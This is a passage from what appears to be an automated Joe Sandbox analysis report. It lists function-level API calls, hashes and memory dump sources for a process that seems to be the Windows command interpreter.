                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                                                                          • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                                                                                                                                                                          • API String ID: 1103618819-4062316587
                                                                                                                                                                                                                          • Opcode ID: 70ee1d07a0f9ce21a9d5334541733dca1ed4ff7114e1a4e0185abb49c27c9318
                                                                                                                                                                                                                          • Instruction ID: 8dff26801422612b6ae2b4d3c3733d553543976efd1e2af3caf834225cd9d509
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70ee1d07a0f9ce21a9d5334541733dca1ed4ff7114e1a4e0185abb49c27c9318
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9841B539B012158BCF20DF6898517FA73B5AF88750F69046AE945EB390EB659E42C360
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 001B2652
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B2670
                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001B2694
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateSemaphore
                                                                                                                                                                                                                          • String ID: _p0$wil
                                                                                                                                                                                                                          • API String ID: 4049970386-1814513734
                                                                                                                                                                                                                          • Opcode ID: 4c279d25a5048f02db21f70f6b5cec4f26135099151794247cac5369c79ddc98
                                                                                                                                                                                                                          • Instruction ID: e437d5e4e0ec80cb3cf324e1263f6c344b6ec177d1200cd6e4ce8b2d3b4c5bc9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c279d25a5048f02db21f70f6b5cec4f26135099151794247cac5369c79ddc98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B231E475B401198BCB25DF34CD98AEA33B5FFA5310F154168EC15D7240DB74CE488B60
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001B5295
                                                                                                                                                                                                                            • Part of subcall function 001A727B: __iob_func.MSVCRT ref: 001A7280
                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 001B5215
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __iob_func_wcsnicmpfprintf
                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                          • API String ID: 1828771275-2781220306
                                                                                                                                                                                                                          • Opcode ID: fe6997d60334d96c1d2119515c4eaa21c29fb8b479e99d088332df293a38661e
                                                                                                                                                                                                                          • Instruction ID: c6887951a03dc8960cad9f1963bf60097257e3f3f073589fd9befd741f089180
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe6997d60334d96c1d2119515c4eaa21c29fb8b479e99d088332df293a38661e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB312F36E01611DBCF28EB68DC45BEEB762DF58700F14046DEC0AE3281EB705E41C655
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019AB7F: iswspace.MSVCRT ref: 0019AB8D
                                                                                                                                                                                                                            • Part of subcall function 0019AB7F: wcschr.MSVCRT ref: 0019AB9E
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0019B3FC
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0019B40E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                          • String ID: &<|>$+: $=,;
                                                                                                                                                                                                                          • API String ID: 3458554142-2256444845
                                                                                                                                                                                                                          • Opcode ID: 09d67d85e8f2f6499f1120ee7df75507c0b75e75f002be703b2708664abb84ad
                                                                                                                                                                                                                          • Instruction ID: 404dfd25ef94f3a8ce1dc2f799d391f23bbc29dffa38c29dddc0c3a11b9b6a85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09d67d85e8f2f6499f1120ee7df75507c0b75e75f002be703b2708664abb84ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56113632A08114A6CF34DB66D58157EB7E7FFB2B50B29002AE8C297380F7319D40E251
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0019FD3A
                                                                                                                                                                                                                          • wcsspn.MSVCRT ref: 0019FF18
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,001A2229,00000000,-00000105,?,00000000,00000000), ref: 001A000F
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D3A
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D44
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D57
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1535828850-0
                                                                                                                                                                                                                          • Opcode ID: bc355172267078ffa2d7221f7e78f1ab38b74cdc563f57cc73876d6ed2f49338
• Instruction ID: ac5c9feea286d0c912f662b8e090d7f564521f044a69196d5af01c08da5f6b1c
• Opcode Fuzzy Hash: bc355172267078ffa2d7221f7e78f1ab38b74cdc563f57cc73876d6ed2f49338
• Instruction Fuzzy Hash: 82C17D75A00215DFCB29DF18D890BA9B7B6FF49314F5581AEE40ADB651EB309E82CF40

APIs
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset$_setjmp3
• String ID:
• API String ID: 4215035025-0
• Opcode ID: ba9d047ede9bca36918a71301036e075a26a2f88436eab9e88caea24a79091a6
• Instruction ID: e1c6acd7fabc8d73c6d015440ef30d29dfc7d7328320db14e7a208b263bd90d8
• Opcode Fuzzy Hash: ba9d047ede9bca36918a71301036e075a26a2f88436eab9e88caea24a79091a6
• Instruction Fuzzy Hash: F9516CB1E012299BCF25DBA5DC94AEEBBB9FB55340F1400A9E609A7140DB309F84CF61

APIs
• memset.MSVCRT ref: 001B9631
• memset.MSVCRT ref: 001B964F
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• _wcsicmp.MSVCRT ref: 001B96FD
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 001B971B
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 001B9733
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset$_wcsicmp
• String ID:
• API String ID: 1670951261-0
• Opcode ID: d389dc846efd1ee5f87790b1d5e41df93b71703d20af3758e87c6be0ab4e1d34
• Instruction ID: 0cc0beeacacd15c27c470aae9be935de8921f2d124f0e2f0fbc4434cb6c67a4e
• Opcode Fuzzy Hash: d389dc846efd1ee5f87790b1d5e41df93b71703d20af3758e87c6be0ab4e1d34
• Instruction Fuzzy Hash: 6941AE71A102199BDF24CAA5CC85BEEB7B8EF18344F4400A9EA05E3141DB34DF84CF60

APIs
• _get_osfhandle.MSVCRT ref: 001B9527
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B952F
• _get_osfhandle.MSVCRT ref: 001B95B5
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B95BD
  • Part of subcall function 001B8C50: longjmp.MSVCRT(001D0A70,00000001,0019206C,00195E68,?,?,?,?,00000000), ref: 001B8CC4
  • Part of subcall function 001B8C50: memset.MSVCRT ref: 001B8D1D
  • Part of subcall function 001B8C50: memset.MSVCRT ref: 001B8D45
  • Part of subcall function 001B8C50: memset.MSVCRT ref: 001B8D6D
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B95CC
  • Part of subcall function 0019A16C: _close.MSVCRT ref: 0019A19B
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
• String ID:
• API String ID: 288106245-0
• Opcode ID: 33b3eb1b814fcd7dfc4ca1344ab607907cba1302b3eeb2da2d4ef17e3164b0e3
• Instruction ID: 74a8bbcf919c26715fa39b5fc917a2b86318fb7da08d1c9a28485623c8e7a1e1
• Opcode Fuzzy Hash: 33b3eb1b814fcd7dfc4ca1344ab607907cba1302b3eeb2da2d4ef17e3164b0e3
• Instruction Fuzzy Hash: A031A471A11204AFEF29EF74D849BEE7769EF54311F20812AF602D61C1DB74DD428B50

APIs
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,001A1775,-00000001,-00000001,-00000001,-00000001), ref: 001A2650
• _get_osfhandle.MSVCRT ref: 001AF339
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,001A1775,-00000001,-00000001,-00000001,-00000001), ref: 001AF347
• longjmp.MSVCRT(001D0A30,00000001,?,00000104,00000000,?,?,001A1775,-00000001,-00000001,-00000001,-00000001), ref: 001AF383
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,001A87F0,?,?,?,001A87F0,00000000,?,00194A0A), ref: 001AF390
  • Part of subcall function 0019DD98: _get_osfhandle.MSVCRT ref: 0019DDA3
  • Part of subcall function 0019DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
• String ID:
• API String ID: 158340877-0
• Opcode ID: da6e41e79dfe20dc165fea0ab42d114421cdadd37a244866e8a8e1e5442e215b
• Instruction ID: 80be944f90c325a125fb29c85d1813ddc56daf0412c3ab11f50f6ae46693a8c7
• Opcode Fuzzy Hash: da6e41e79dfe20dc165fea0ab42d114421cdadd37a244866e8a8e1e5442e215b
• Instruction Fuzzy Hash: 7C31AB75A023059FDB24EFB8D885ABEB7F8EF58B55B14452EE846C2540EB70D841CB50

APIs
• _get_osfhandle.MSVCRT ref: 001A4CC2
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001B8FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 001A4CCA
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B0BFC
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B0C48
• DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001B0C71
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ErrorFileLast$DeleteRead_get_osfhandle
• String ID:
• API String ID: 3588551418-0
• Opcode ID: 7671413e1e318a7d6d5de484f3bf1818a873a4e40cd4908b9bcfee9e4dd2a3d4
• Instruction ID: 7ddf9c2c81cd6db732807207864240fcc9fb6858eee191073253a8efdb7d2b48
• Opcode Fuzzy Hash: 7671413e1e318a7d6d5de484f3bf1818a873a4e40cd4908b9bcfee9e4dd2a3d4
• Instruction Fuzzy Hash: 2031F134601200AFDF18DFA4D8469BF3B69FF95314B20442AE802C3691DB74DC80CB61

APIs
• _get_osfhandle.MSVCRT ref: 0019E29B
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0019E2A3
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1013686580-0
                                                                                                                                                                                                                          • Opcode ID: 473623ee459ffcb10241cdd78f4a17cb723fc6bcbca799779dd849be91ac922a
                                                                                                                                                                                                                          • Instruction ID: 2dee8803a6dcc5c1e2212770ec5066ebfe68f6c966f5af529b2a78b7ef20587a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 473623ee459ffcb10241cdd78f4a17cb723fc6bcbca799779dd849be91ac922a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B110635206600AFD728A764FC4EF563B95EF0B761F310416F106969E0CB71D880CA21
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: _get_osfhandle.MSVCRT ref: 0019DDA3
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 001B8571
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 001B857E
                                                                                                                                                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 001B85C7
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 001B85D5
                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 001B85DC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3008996577-0
                                                                                                                                                                                                                          • Opcode ID: 3734cf0d82e39d1b4ea159805783b6a6ef5cdb82c6c7614d7f8e96e05518f449
                                                                                                                                                                                                                          • Instruction ID: dccdda34b52f4371023de2b09ba7494a6af18f33c0adc8c669a646b62f339ea2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3734cf0d82e39d1b4ea159805783b6a6ef5cdb82c6c7614d7f8e96e05518f449
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36110735A112099ACB14EFF49C05AEEB7B8AF0D710F10411AF515E7690EB349A44CB6A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 001A7122
                                                                                                                                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 001A7131
                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 001A713A
                                                                                                                                                                                                                          • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 001A7143
                                                                                                                                                                                                                          • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 001A7158
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1445889803-0
                                                                                                                                                                                                                          • Opcode ID: b7a186749674c2890574ee59ab5764bfef91b632940814de0fe5f3e2fa421271
                                                                                                                                                                                                                          • Instruction ID: 0ed0432da1cb99d2a086f2efcdcebbbe0fe55fa3c0c43d4ccbd5ae49b767aafb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7a186749674c2890574ee59ab5764bfef91b632940814de0fe5f3e2fa421271
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97110A75E06208ABCF10DFB9D94869EB7F5FF58315F910966E401E7250E7309B408B41
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,001A87E5,00000000,?,00194A0A), ref: 001B484A
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: _get_osfhandle.MSVCRT ref: 0019DDA3
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,001A87E5,00000000,?,00194A0A), ref: 001B4879
                                                                                                                                                                                                                          • _getch.MSVCRT ref: 001B487F
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,001A87E5,00000000,?,00194A0A), ref: 001B4897
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,001A87E5,00000000,?,00194A0A), ref: 001B48AD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 491502236-0
                                                                                                                                                                                                                          • Opcode ID: 3b19f9bf7979766e871361b2dfb91cf4b471382eacbd8b0cf5eedc68d9d370e6
                                                                                                                                                                                                                          • Instruction ID: 26a2cfd820870ffad52d7d6a5dbb6060b2ba3dbbde3a830f311c43382f7e3776
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b19f9bf7979766e871361b2dfb91cf4b471382eacbd8b0cf5eedc68d9d370e6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1201D431102350FFEB14ABE1AC0AFAF3B65DF01720F104119F805965E2DBB18980CA55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00196513: memset.MSVCRT ref: 00196593
                                                                                                                                                                                                                            • Part of subcall function 0019DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00198E86,00198E5A,00000000), ref: 0019DC98
                                                                                                                                                                                                                            • Part of subcall function 0019DC60: RtlFreeHeap.NTDLL(00000000), ref: 0019DC9F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001AA097
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
